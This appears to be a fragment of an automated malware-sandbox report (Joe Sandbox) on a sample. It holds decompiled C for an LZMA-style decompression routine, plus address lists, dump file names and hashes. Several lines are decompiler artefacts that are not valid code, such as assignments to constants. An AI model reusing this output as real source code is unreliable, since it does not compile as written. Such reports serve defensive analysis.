													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00407395
0x00407395
0x00407399
0x004073be
0x004073c8
0x00000000
0x0040739b
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a8
0x004073ac
0x004073ac
0x004073af
0x00407489
0x00407489
0x00407490
0x00407490
0x00407493
0x0040749a
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00000000
0x00407482
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x00000000
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00407524
0x00000000
0x00407399

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
